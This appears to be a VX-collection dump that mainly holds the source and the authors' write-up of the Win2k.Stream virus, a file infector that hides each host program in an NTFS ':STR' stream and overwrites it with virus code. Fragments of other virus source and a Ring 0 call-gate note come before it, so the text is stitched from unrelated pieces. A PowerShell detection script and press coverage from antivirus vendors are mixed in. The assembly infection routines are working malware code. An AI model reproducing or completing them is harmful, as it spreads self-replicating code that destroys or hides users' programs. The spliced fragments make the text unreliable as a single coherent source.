DB 06CH,075H,065H,000H,01FH,002H,054H,06CH,073H,041H,06CH,06CH,06FH,063H,000H
DB 000H,020H,002H,054H,06CH,073H,046H,072H,065H,065H,000H,0FDH,001H,053H,065H
DB 074H,04CH,061H,073H,074H,045H,072H,072H,06FH,072H,000H,000H,021H,002H,054H
DB 06CH,073H,047H,065H,074H,056H,061H,06CH,075H,065H,000H,055H,001H,048H,065H
DB 061H,070H,043H,072H,065H,061H,074H,065H,000H,000H,057H,001H,048H,065H,061H
DB 070H,044H,065H,073H,074H,072H,06FH,079H,000H,0FAH,001H,053H,065H,074H,048H
DB 061H,06EH,064H,06CH,065H,043H,06FH,075H,06EH,074H,000H,000H,0DCH,000H,047H
DB 065H,074H,046H,069H,06CH,065H,054H,079H,070H,065H,000H,016H,001H,047H,065H
DB 074H,053H,074H,064H,048H,061H,06EH,064H,06CH,065H,000H,000H,014H,001H,047H
DB 065H,074H,053H,074H,061H,072H,074H,075H,070H,049H,06EH,066H,06FH,041H,000H
DB 044H,000H,044H,065H,06CH,065H,074H,065H,043H,072H,069H,074H,069H,063H,061H
DB 06CH,053H,065H,063H,074H,069H,06FH,06EH,000H,0E9H,000H,047H,065H,074H,04DH
DB 06FH,064H,075H,06CH,065H,046H,069H,06CH,065H,04EH,061H,06DH,065H,041H,000H
DB 000H,098H,000H,047H,065H,074H,043H,050H,049H,06EH,066H,06FH,000H,092H,000H
DB 047H,065H,074H,041H,043H,050H,000H,000H,0F6H,000H,047H,065H,074H,04FH,045H
DB 04DH,043H,050H,000H,000H,08BH,000H,046H,072H,065H,065H,045H,06EH,076H,069H
DB 072H,06FH,06EH,06DH,065H,06EH,074H,053H,074H,072H,069H,06EH,067H,073H,041H
DB 000H,0D0H,000H,047H,065H,074H,045H,06EH,076H,069H,072H,06FH,06EH,06DH,065H
DB 06EH,074H,053H,074H,072H,069H,06EH,067H,073H,000H,08CH,000H,046H,072H,065H
DB 065H,045H,06EH,076H,069H,072H,06FH,06EH,06DH,065H,06EH,074H,053H,074H,072H
DB 069H,06EH,067H,073H,057H,000H,0D2H,000H,047H,065H,074H,045H,06EH,076H,069H
DB 072H,06FH,06EH,06DH,065H,06EH,074H,053H,074H,072H,069H,06EH,067H,073H,057H
DB 000H,000H,042H,002H,057H,069H,064H,065H,043H,068H,061H,072H,054H,06FH,04DH
DB 075H,06CH,074H,069H,042H,079H,074H,065H,000H,04FH,002H,057H,072H,069H,074H
DB 065H,046H,069H,06CH,065H,000H,064H,001H,049H,06EH,069H,074H,069H,061H,06CH
DB 069H,07AH,065H,043H,072H,069H,074H,069H,063H,061H,06CH,053H,065H,063H,074H
DB 069H,06FH,06EH,000H,04FH,000H,045H,06EH,074H,065H,072H,043H,072H,069H,074H
DB 069H,063H,061H,06CH,053H,065H,063H,074H,069H,06FH,06EH,000H,000H,077H,001H
DB 04CH,065H,061H,076H,065H,043H,072H,069H,074H,069H,063H,061H,06CH,053H,065H
DB 063H,074H,069H,06FH,06EH,000H,000H,053H,001H,048H,065H,061H,070H,041H,06CH
DB 06CH,06FH,063H,000H,059H,001H,048H,065H,061H,070H,046H,072H,065H,065H,000H
DB 000H,078H,001H,04CH,06FH,061H,064H,04CH,069H,062H,072H,061H,072H,079H,041H
DB 000H,000H,083H,000H,046H,06CH,075H,073H,068H,046H,069H,06CH,065H,042H,075H
DB 066H,066H,065H,072H,073H,000H,000H,006H,002H,053H,065H,074H,053H,074H,064H
DB 048H,061H,06EH,064H,06CH,065H,000H,000H,0F8H,001H,053H,065H,074H,046H,069H
DB 06CH,065H,050H,06FH,069H,06EH,074H,065H,072H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,010H,000H,000H,034H,001H
DB 000H,000H,020H,030H,026H,030H,07CH,030H,093H,030H,099H,030H,0E4H,030H,0EAH
DB 030H,00BH,031H,01FH,031H,027H,031H,064H,031H,082H,031H,088H,031H,0E1H,031H
DB 0F0H,031H,0F6H,031H,01CH,032H,022H,032H,064H,032H,084H,032H,089H,032H,094H
DB 032H,0A5H,032H,0ADH,032H,0C8H,032H,0E0H,032H,0FBH,032H,013H,033H,03DH,033H
DB 073H,033H,0A7H,033H,0B5H,033H,0D3H,033H,0E9H,033H,0F8H,033H,00BH,034H,02DH
DB 034H,034H,034H,054H,034H,079H,034H,09DH,034H,0BEH,034H,0E6H,034H,002H,035H
DB 00BH,035H,033H,035H,045H,035H,04EH,035H,06FH,035H,075H,035H,07BH,035H,097H
DB 035H,09DH,035H,0A6H,035H,0ADH,035H,0C8H,035H,0D7H,035H,0E0H,035H,0E5H,035H
DB 0EBH,035H,0F5H,035H,00EH,036H,013H,036H,01EH,036H,024H,036H,05EH,036H,069H
DB 036H,06FH,036H,0C3H,036H,0D2H,036H,0F0H,036H,0FAH,036H,066H,037H,081H,037H
DB 090H,037H,0B0H,037H,0C1H,037H,0CCH,037H,0D1H,037H,0DEH,037H,0E3H,037H,029H
DB 038H,03CH,038H,044H,038H,04DH,038H,056H,038H,069H,038H,070H,038H,075H,038H
DB 082H,038H,087H,038H,0A6H,038H,0F8H,038H,0FDH,038H,01EH,039H,025H,039H,038H
DB 039H,056H,039H,062H,039H,068H,039H,087H,039H,0A4H,039H,0ABH,039H,0B2H,039H
DB 0D0H,039H,0D7H,039H,0EAH,039H,006H,03AH,012H,03AH,027H,03AH,02EH,03AH,0A4H
DB 03AH,0ABH,03AH,0CBH,03AH,0D0H,03AH,0E1H,03AH,0E8H,03AH,01CH,03BH,022H,03BH
DB 049H,03BH,05DH,03BH,094H,03BH,09BH,03BH,0BAH,03BH,0EAH,03BH,0F4H,03BH,00DH
DB 03CH,027H,03CH,048H,03CH,071H,03CH,07FH,03CH,0B8H,03CH,0BFH,03CH,0D4H,03CH
DB 0DBH,03CH,01AH,03DH,035H,03DH,06CH,03DH,085H,03DH,0F0H,03DH,01BH,03EH,024H
DB 03EH,029H,03EH,02FH,03EH,03AH,03EH,09CH,03EH,0A2H,03EH,0FBH,03EH,03FH,03FH
DB 000H,000H,000H,020H,000H,000H,040H,001H,000H,000H,024H,030H,045H,030H,0B2H
DB 030H,0F2H,030H,006H,031H,014H,031H,022H,031H,05AH,031H,078H,031H,088H,031H
DB 09AH,031H,0BCH,031H,0DAH,031H,0E0H,031H,0FFH,031H,00CH,032H,011H,032H,01FH
DB 032H,028H,032H,04EH,032H,053H,032H,05AH,032H,07CH,032H,0C2H,032H,0D5H,032H
DB 0DFH,032H,0EAH,032H,0F4H,032H,0FFH,032H,008H,033H,022H,033H,029H,033H,048H
DB 033H,04CH,033H,050H,033H,054H,033H,058H,033H,074H,033H,081H,033H,086H,033H
DB 08CH,033H,091H,033H,0B5H,033H,0C2H,033H,0D0H,033H,0E0H,033H,0ECH,033H,00AH
DB 034H,010H,034H,061H,034H,088H,034H,09EH,034H,0AFH,034H,0BFH,034H,0CCH,034H
DB 00CH,035H,031H,035H,055H,035H,061H,035H,070H,035H,085H,035H,0A9H,035H,0C2H
DB 035H,0CBH,035H,0DEH,035H,0EBH,035H,0F4H,035H,01AH,036H,027H,036H,073H,036H
DB 081H,036H,0C2H,036H,0F5H,036H,02AH,037H,049H,037H,059H,037H,061H,037H,07FH
DB 037H,092H,037H,099H,037H,0A1H,037H,0A9H,037H,0B1H,037H,0C5H,037H,0CEH,037H
DB 001H,038H,009H,038H,011H,038H,019H,038H,03CH,038H,071H,038H,090H,038H,0AAH
DB 038H,0B1H,038H,0C8H,038H,0CFH,038H,0D6H,038H,0F0H,038H,022H,039H,038H,039H
DB 03FH,039H,046H,039H,060H,039H,092H,039H,0B6H,039H,0BBH,039H,0D4H,039H,0E7H
DB 039H,00CH,03AH,013H,03AH,021H,03AH,086H,03AH,090H,03AH,0A7H,03AH,0AEH,03AH
DB 0B4H,03AH,0BFH,03AH,0C5H,03AH,0CDH,03AH,0D6H,03AH,0DEH,03AH,0E3H,03AH,0EBH
DB 03AH,0F0H,03AH,002H,03BH,00CH,03BH,024H,03BH,072H,03BH,07CH,03BH,088H,03BH
DB 091H,03BH,09CH,03BH,0AAH,03BH,0B4H,03BH,0C9H,03BH,0DCH,03BH,0E4H,03BH,0FAH
DB 03BH,010H,03CH,02FH,03CH,047H,03CH,06BH,03CH,0B7H,03CH,0C4H,03CH,0C9H,03CH
DB 0EFH,03CH,0FEH,03CH,010H,03DH,021H,03DH,020H,03EH,03CH,03EH,07FH,03EH,069H
DB 03FH,079H,03FH,0B4H,03FH,0BEH,03FH,000H,030H,000H,000H,040H,000H,000H,000H
DB 018H,030H,030H,030H,0C8H,030H,07FH,031H,0AAH,031H,0C6H,031H,0D8H,032H,0F0H
DB 032H,076H,033H,080H,033H,0B9H,033H,01FH,034H,02CH,034H,051H,034H,0B8H,034H
DB 0C8H,034H,0E8H,034H,011H,035H,056H,035H,06FH,035H,0B7H,035H,0DEH,035H,0F9H
DB 035H,027H,036H,033H,036H,076H,036H,088H,036H,0B1H,036H,000H,050H,000H,000H
DB 058H,000H,000H,000H,00CH,030H,018H,030H,03CH,030H,068H,030H,08CH,035H,094H
DB 035H,09CH,035H,0A4H,035H,0ACH,035H,0B4H,035H,0BCH,035H,0C4H,035H,0CCH,035H
DB 0D4H,035H,0DCH,035H,0E4H,035H,0ECH,035H,0F4H,035H,0FCH,035H,004H,036H,00CH
DB 036H,07CH,036H,09CH,036H,0ACH,036H,0BCH,036H,028H,038H,030H,038H,0E0H,03AH
DB 0E4H,03AH,0E8H,03AH,088H,03CH,08CH,03CH,090H,03CH,094H,03CH,098H,03CH,09CH
DB 03CH,0A0H,03CH,0A4H,03CH,0A8H,03CH,0ACH,03CH,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
MACROSIZE
align 4
CreateFile DD 0
CloseHandle DD 0
FindFirstFile DD 0
FindNextFile DD 0
ReadFile DD 0
MapViewOfFile DD 0
UnmapViewOfFile DD 0
CreateFileMappingA DD 0
LoadLibraryA DD 0
FreeLibraryA DD 0
WriteFileA DD 0
DeleteFileA DD 0
GPA DD 0
SearcHandle DD 0
FileHandle DD 0
NewSize DD 0
MapHandle DD 0
MapAddress DD 0
BYTES DD 0
FILETIME STRUC
FT_dwLowDateTime DD ?
FT_dwHighDateTime DD ?
FILETIME ENDS
Win32FindData:
WFD_dwFileAttributes DD ?
WFD_ftCreationTime FILETIME ?
WFD_ftLastAccessTime FILETIME ?
WFD_ftLastWriteTime FILETIME ?
WFD_nFileSizeHigh DD ?
WFD_nFileSizeLow DD ?
WFD_dwReserved0 DD ?
WFD_dwReserved1 DD ?
FNAME DB MAX_PATH DUP (?)
WFD_szAlternateFileName DB 13 DUP (?)
DB 03 DUP (?)
DB 0100h dup (0)
align 4
EXITPROC:
PUSH 0
CALL ExitProcess
ENDS
END MEGAMIX
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[ADONAI.ASM]ÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[CALLGATE.TXT]ÄÄÄ
Run any Ring 0 code from a WIN32 application on Windows NT
-----------------------------------------------------------
Copyright (C) 1997 Prasad Dabak & Sandeep Phadke & Milind Borate
Background
----------
Implementation
--------------
How to Contact us
-----------------
Prasad : pdabak@cyberspace.org
Sandeep : sandeep@giaspn01.vsnl.net.in
Milind : milind@cyberspace.org
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[CALLGATE.TXT]ÄÄÄ
COMMENT#
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ Win2k.Stream ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ by Benny/29A and Ratter ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
Let us introduce a very small and simple infector presenting how to use features
of NTFS in viruses. This virus loox like a standard Petite-compressed PE file.
However, it presents the newest PE file infection method.
How does the virus worx? It uses streamz, the newest feature of the NTFS
filesystem, and file compression, already implemented in the old NTFS fs.
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ Basic principles of NTFS streamz ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
How does the file loox? Ya know that a file contains exactly what you can see
when you open it (e.g. in WinCommander). NTFS, as implemented by Windows 2000,
has a new feature: the file can be divided into streamz. The content you see
when you open the file is called the Primary stream; usually files don't have
more than one stream. However, you can create a NEW stream (= new content) in
an already existing file without overwriting the existing content.
Example:
If you have NTFS, you can test it. Copy "calc.exe", for instance, to an NTFS
volume, then create the new file "calc.exe:stream" and write "blahblah" into
it. Open "calc.exe". What's there? Calculator ofcoz. Now open
"calc.exe:stream". What's there? "blahblah", the new file in the old one :)
The virus infects a file by moving the old content to a new stream and
replacing the primary stream with the virus code.
ÉÍCalc.exeÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄPrimary stream (visible part)Ä¿º
º³ Calculator ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
ÉÍCalc.exeÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄPrimary stream (calc.exe)Ä¿ÚÄNext stream (calc.exe:STR)Ä¿ º
º³ Virus ³³ Calculator ³ º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ º
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
* If the user copies the infected file to a non-NTFS partition (in this case
only the primary stream is copied), the host program is destroyed and
instead of running the host program the virus shows a message box. That can
also be called a payload :P
* The virus is very small, exactly 3628 bytes, becoz it's compressed by the
Petite 2.1 PE compression utility (http://www.icl.ndirect.co.uk/petite/).
* This virus was coded in the Czech Republic by Benny/29A and Ratter, at our
common VX meeting in Ratter's city... we just coded it to show that
Windows 2000 is just another OS designed for viruses... it really is :)
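As an added defensive example (not part of the article or the virus source), the following PowerShell scan looks for the symptoms the text above describes: a named NTFS stream on an executable, an MZ header inside that stream (the displaced host), the compressed attribute the virus sets as its infection mark, and a cluster of flagged files sharing one primary-stream size. It assumes an NTFS volume and PowerShell 3.0 or later; the stream name "STR" and the extensions are taken from the text.

```powershell
# Added example: scan a directory tree for "stream companion" infection symptoms.
# Assumptions: NTFS volume, Windows PowerShell 3.0+ or PowerShell 7, read access.
param(
    [string]$Root = '.',
    [string]$CompanionStream = 'STR'   # stream name used by Win2k.Stream (from the text)
)

function Read-StreamHead {
    # Return the first $Count bytes of a named stream. The byte-mode switch differs
    # between Windows PowerShell (-Encoding Byte) and PowerShell 6+ (-AsByteStream).
    param([string]$Path, [string]$Stream, [int]$Count = 2)
    if ($PSVersionTable.PSVersion.Major -ge 6) {
        Get-Content -LiteralPath $Path -Stream $Stream -AsByteStream -TotalCount $Count -ErrorAction SilentlyContinue
    } else {
        Get-Content -LiteralPath $Path -Stream $Stream -Encoding Byte -TotalCount $Count -ErrorAction SilentlyContinue
    }
}

$executables = Get-ChildItem -LiteralPath $Root -Recurse -File -ErrorAction SilentlyContinue |
    Where-Object { $_.Extension -in '.exe', '.dll', '.scr', '.cpl' }

$findings = foreach ($file in $executables) {
    # Every NTFS file has the unnamed ':$DATA' stream; anything else is an alternate data stream.
    $ads = Get-Item -LiteralPath $file.FullName -Stream * -ErrorAction SilentlyContinue |
           Where-Object { $_.Stream -ne ':$DATA' }
    foreach ($s in $ads) {
        $reasons = @()
        if ($s.Stream -eq $CompanionStream) {
            $reasons += "stream named '$CompanionStream'"
        }
        # A companion infector leaves the original program in the named stream,
        # so the stream itself starts with a DOS/PE header ('MZ' = 0x4D 0x5A).
        $head = @(Read-StreamHead -Path $file.FullName -Stream $s.Stream)
        if ($head.Count -ge 2 -and $head[0] -eq 0x4D -and $head[1] -eq 0x5A) {
            $reasons += 'named stream starts with an MZ header (displaced host?)'
        }
        # The virus sets NTFS compression on infected files as its "already infected" mark.
        if ($file.Attributes -band [System.IO.FileAttributes]::Compressed) {
            $reasons += 'NTFS compressed attribute set'
        }
        if ($reasons.Count -gt 0) {
            [pscustomobject]@{
                Path        = $file.FullName
                PrimarySize = $file.Length      # what Explorer and a default scan see
                Stream      = $s.Stream
                StreamSize  = $s.Length
                Reasons     = $reasons -join '; '
            }
        }
    }
}

# Every infected primary stream is the virus itself, so infected files all report
# the same size: a cluster of flagged files with identical PrimarySize is the strongest signal.
$findings |
    Group-Object PrimarySize |
    Where-Object { $_.Count -gt 1 } |
    ForEach-Object { Write-Warning "$($_.Count) flagged files share primary-stream size $($_.Name) bytes" }

$findings | Sort-Object PrimarySize, Path | Format-Table -AutoSize
```

The named stream still holds the complete host program, which is why the text notes that copying the file to a non-NTFS volume loses it; keep the file on NTFS until the stream has been examined.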
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ In the media ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
AVP's description:
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
This is the first known Windows virus using the "stream companion" infection
method. That method is based on an NTFS feature that allows the creation of
multiple data streams associated with a file.
*NTFS Streams*
---------------
Each file contains at least one default data stream that is accessed just by
the file name. Each file may also contain additional stream(s) that can be
accessed by their personal names (filename:streamname).
The default file stream is the file body itself (in pre-NTFS terms). For
instance, when an EXE file is executed the program is read from the default
file stream; when a document is opened, its content is also read from the
default stream.
Additional file streams may contain any data. The streams cannot be accessed or
modified without reference to the file. When the file is deleted, its streams
are deleted as well; if the file is renamed, the streams follow its new name.
*Virus Details*
----------------
The virus itself is a Windows application (PE EXE file) compressed using the
Petite PE EXE file compressor and is about 4K in size. When run it infects all
EXE files in the current directory and then returns control to the host file.
If any error occurs, the virus displays the message:
While infecting a file the virus creates a new stream associated with the victim
file. That stream has the name "STR", i.e. the complete stream name is
"FileName:STR". The virus then moves the victim file body to the STR stream
(default stream, see above) and then overwrites the victim file body (default
stream) with its (virus) code.
As a result, when an infected file is executed Windows reads the default stream
(which is overwritten by virus code) and executes it. Also, Windows reports the
same file size for all infected files - that is the virus length.
To release control to the host program the virus just creates a new process by
accessing the original file program using the name "FileName:STR".
That infection method should work on any NTFS system, but the virus checks the
system version and runs only under Win2000.
The virus originates from the Czech Republic and was created at the end of
August by the hackers going by the pseudonyms of Benny and Ratter. To date,
Kaspersky Lab has not registered any infections resulting from this virus;
however, its working capacity and ability for existence "in-the-wild" are
unchallenged.
"Certainly, this virus begins a new era in computer virus creation," said
Eugene Kaspersky, Head of Anti-Virus Research at Kaspersky Lab. "The 'Stream
Companion' technology the virus uses to plant itself into files makes its
detection and disinfection extremely difficult to complete."
Unlike previously known methods of file infection (adding the virus body at
beginning, ending or any other part of a host file), the "Stream" virus
exploits the NTFS file system (Windows NT/2000) feature, which allows multiple
data streams. For instance, in Windows 95/98 (FAT) files, there is only one
data stream – the program code itself. Windows NT/2000 (NTFS) enables users
to create any number of data streams within the file: independent executable
program modules, as well as various service streams (file access rights,
encryption data, processing time etc.). This makes NTFS files very flexible,
allowing for the creation of user-defined data streams aimed at completing
specific tasks.
"Stream" is the first known virus that uses the feature of creating multiple
data streams for infecting files of the NTFS file system (see picture 1). To
complete this, the virus creates an additional data stream named "STR" and
moves the original content of the host program there. Then, it replaces the
main data stream with the virus code. As a result, when the infected program
is run, the virus takes control, completes the replicating procedure and then
passes control to the host program.
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³°°°°°°°°°°°°°°°°°°°³ ³°°°°°°°°°°°°°°°°°°°³
³°°°°°°°°°°°°°°°°°°°³ ³°°° main stream°°°°³
³°°°°°°°°°°°°°°°°°°°³ ³°°° virus body°°°°°³
³°°°°main stream°°°°³ ³°°°°°°°°°°°°°°°°°°°³
³°°°°°°°°°°°°°°°°°°°³ ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³°°°°program body°°°³ ³°°°°°°°°°°°°°°°°°°°³
³°°°°°°°°°°°°°°°°°°°³ ³°additional stream°³
³°°°°°°°°°°°°°°°°°°°³ ³°°°program body°°°°³
³°°°°°°°°°°°°°°°°°°°³ ³°°°°°°°°°°°°°°°°°°°³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³±±±±±±±±±±±±±±±±±±±³ ³±±±±±±±±±±±±±±±±±±±³
³±±service streams±±³ ³±±service streams±±³
³±±±±±±±±±±±±±±±±±±±³ ³±±±±±±±±±±±±±±±±±±±³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
"By default, anti-virus programs check only the main data stream. There will be
no problems protecting users from this particular virus," Eugene Kaspersky
continues. "However, the viruses can move to additional data streams. In this
case, many anti-virus products will become obsolete, and their vendors will be
forced to urgently redesign their anti-virus engines."
In MSNBC's news:
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Sept. 6 — A new kind of computer virus has been released, but security experts
are in disagreement over just how menacing it is. The virus demonstrates a
technique that future writers can use to hide their malicious software from
most current antivirus scanners. But some antivirus companies are playing down
the threat.
The virus takes advantage of a little-used feature included in Windows 2000 and
older Windows NT systems that allows programs to be split into pieces called
streams. Generally, the body of a program resides in the main stream. But other
streams can be created to store information related to what’s in the main
stream. Joel Scambray, author of “Hacking Exposed,” described these additional
streams as “Post-it notes” attached to the main file.
The problem is that antivirus programs only examine the main stream. W2K.Stream
demonstrates a programmer’s ability to create an additional stream and hide
malicious code there.
“Certainly, this virus begins a new era in computer virus creation,” said
Eugene Kaspersky, Head of Anti-Virus Research at Kaspersky Lab, in a press
release. “The ‘Stream Companion’ technology the virus uses to plant itself into
files makes its detection and disinfection extremely difficult to complete.”
No W2K.stream infections have been reported, and experts don’t believe the
virus is “in the wild” — circulating on the Internet — yet. At any rate, this
virus actually makes things easy for antivirus companies. If a user is
infected, the program creates an alternate stream and places the legitimate
file in this alternate location; the virus replaces it as the main stream. That
makes detection by current antivirus products easy. But future viruses could
do just the opposite, evading current antivirus products.
One antivirus researcher who requested anonymity called release of the bug
“somewhat akin to the first macro virus.” He added that reengineering antivirus
software to scan for multiple streams would be a complicated effort.
“In this case, many anti-virus products will become obsolete, and their vendors
will be forced to urgently redesign their anti-virus engines,” Kaspersky said.
There is nothing new about the potential of exploiting the multiple stream
issue; Scambray hints at the problem in the book “Hacking Exposed,” and
described it even more explicitly in a 1998 Infoworld.com article.
“We found that the scanners were incapable of identifying viruses stored within
an alternate data stream,” the report said. “For example if you create the file
MyResume.doc:ILOVEYOU.vbs and store the contents of the I Love You virus within
the alternate data stream file, none of the tested virus scanners were capable
of finding the virus during a complete disk scan.”
But some antivirus companies described the threat as minimal because the
alternate stream trick only hides the bug while it’s stored on a victim’s
computer. Pirkka Palomaki, Director of Product Marketing for F-Secure Corp.,
said for the virus to actually run, it has to come out of hiding and load into
main memory.
“It could increase the ability for scanners to miss something,” said Pat
Nolan, virus researcher at McAfee Corp. “But we’re on top of it. If there is
a vulnerability, it will be short-lived.”
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ How to compile it? ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
Use Petite version 2.1 (http://www.icl.ndirect.co.uk/petite/).
.586p
.model flat,stdcall
;compression flag
STARTUPINFO STRUCT ;used by CreateProcessA API
cb DWORD ?
lpReserved DWORD ?
lpDesktop DWORD ?
lpTitle DWORD ?
dwX DWORD ?
dwY DWORD ?
dwXSize DWORD ?
dwYSize DWORD ?
dwXCountChars DWORD ?
dwYCountChars DWORD ?
dwFillAttribute DWORD ?
dwFlags DWORD ?
wShowWindow WORD ?
cbReserved2 WORD ?
lpReserved2 DWORD ?
hStdInput DWORD ?
hStdOutput DWORD ?
hStdError DWORD ?
STARTUPINFO ENDS
PROCESS_INFORMATION STRUCT
hProcess DWORD ?
hThread DWORD ?
dwProcessId DWORD ?
dwThreadId DWORD ?
PROCESS_INFORMATION ENDS
.data
search_loop:
call infect ;try to infect file
end_host:
mov esi,offset file_name ;get our filename
push esi
@endsz
dec esi
mov edi,esi
mov eax,"RTS:" ;append there :"STR" stream
stosd ;name
pop esi
end_app:
push 0
call ExitProcess ;exit
next_infect:
push offset [WFD.WFD_szFileName]
mov byte ptr [flagz],OPEN_EXISTING
call Create_File ;open found program
jz infect_end
xor eax,eax
push eax
@pushvar <dd ?>
push eax
push eax
push 4
@pushvar <dd 1> ;default compression
push FSCTL_SET_COMPRESSION
push ebx ;NTFS compress it =
call DeviceIoControl ;mark as already infected
; = and save disk space :)
push ebx
call CloseHandle ;close file handle
push 0
push edi
push offset file_name
call CopyFileA ;copy ourself to victim program
push esi
mov esi,edi
@endsz
xchg esi,edi
dec edi
mov eax,"RTS:" ;append :"STR" stream to
stosd ;victim program filename
xor al,al
stosb
push 0
push ebx
call GetFileSize ;get its size
xchg eax,edi
push PAGE_READWRITE
push MEM_COMMIT or MEM_RESERVE
push edi
push 0
call VirtualAlloc ;allocate enough memory
test eax,eax ;for file content
jz infect_end_handle
xchg eax,esi
xor eax,eax
push eax
@pushvar <file_size dd ?>
push edi
push esi
push ebx
call ReadFile ;read file content to
test eax,eax ;allocated memory
jz infect_end_handle
push ebx
call CloseHandle ;close its file handle
push 0
mov ecx,offset file_size
push ecx
push dword ptr [ecx]
push esi
push ebx
call WriteFile ;write there victim program
test eax,eax
jz infect_end_handle
infect_end_handle:
push ebx
call CloseHandle ;close its file handle
infect_end_dealloc:
push MEM_DECOMMIT
push dword ptr [file_size]
push esi
call VirtualFree ;free allocated memory
push MEM_RELEASE
push 0
push esi
call VirtualFree ;release reserved part of mem
infect_end:
ret
; [esp+4] - file_name
Create_File: ;proc for opening file
xor eax,eax
push eax
push eax
db 6ah
flagz db OPEN_EXISTING ;variable file open flag
push eax
push eax
push GENERIC_READ or GENERIC_WRITE
push dword ptr [esp+1ch]
call CreateFileA ;open file
xchg eax,ebx ;handle to EBX
inc ebx ;is EBX -1?
lahf ;store flags
dec ebx ;correct EBX
sahf ;restore flags
retn 4 ;quit from proc
;
; Some macros and equs
;
; Notice this could work only on my system due to the hardcoded address of
; MessageBoxA, but this is only for debugging on my comp ;)
